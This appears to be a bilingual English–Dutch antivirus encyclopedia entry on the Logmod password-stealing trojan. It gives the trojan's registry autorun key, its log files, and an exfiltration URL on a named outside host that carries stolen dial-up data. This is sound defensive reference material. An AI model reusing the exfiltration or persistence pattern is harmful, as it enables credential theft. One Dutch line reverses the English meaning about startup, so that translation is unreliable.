Trojan.PSW.Logmod
The Logmod program belongs to the family of password stealing trojans.
-Het Logmod programma behoort tot de familie van passwords stelende Trojans.
Logmod steals the following information: Windows version, Explorer version, phone book entries, service provider information, RAS data, modem log, e.t.c.
-Logmod steelt de volgende informatie: Windows, Explorer, Telefoonboekcontacten, RAS data, modeminstellingsgegevens, etc.
When run the trojan installs itself into the system. While installing the Logmod trojan registers itself in the system registry auto-run section:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run
Sysres = Sysres.exe
-Wanneer de Trjan gerund wordt installeert het zichzelf in het systeem. Tijdens de installatie registreert het Trojan zich in het systeemregister in de auro-run sectie:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run
Sysres = Sysres.exe
The trojan does not copy/move its file to any other directory, thus it cannot automatically run on Windows boot-up (except if it is originally placed in the Windows or Windows system directory). Therefore, for example, it cannot "install" itself into the system while being run from email attachments. There should be an additional component ("dropper") that installs the trojan into the system.
-De Trojan kopieert geen / verplaatst geen bestanden naar een andere map dus het kan gedraaid worden tijdens het starten van Windows (behalve wanneer het oorspronkelijk geplaatst is in de Windowsmap of Windows systeemmap. Daarom moet er een toegevoegd onderdeel (een dropper) zijn die de Trojan installeert op de pc.
To send stolen data out of infected computers the Logmod opens an Internet URL with the following request:
http://stats.internetsexprovider.com/resident/SysW
eb.php3?country=espana4&Login= %data%
'%data%' contains stings with stolen information that are sent to that URL. Apparently the SysWeb.php at that site gets %data% upon request and passes it to the trojan "master".
-Om "gestolen" informatie vanaf de geinfecteerde pc te versturen. de Logmod opent een link met het volgende verzoek:
http://stats.internetsexprovider.com/resident/SysW
eb.php3?country=espana4&Login= %data%
'%data%' contains stings with stolen information that are sent to that URL. Apparently the SysWeb.php at that site gets %data% upon request and passes it to the trojan "master".
Miscellaneous
Logmod creates additional files in the Windows directory:
SysTrace.daf, CallTrace.daf, DialTrace.daf
These files contain data that is logged/stolen.
-Diverse
Logmod creeert toegevoegde bestanden in de Windowsmap:
SysTrace.daf, CallTrace.daf, DialTrace.daf
-Deze bestanden bevatten de gestolen data (passwords, inloggegevens etc...)
The Logmod trojan also creates the following additional registry key for its internal use:
HKLM\Software\DIALPASS
DateEspana4
-De Logmod Trojan creeert de volgende toevoegde registersleutel voor eigen gebruik:
HKLM\Software\DIALPASS
DateEspana4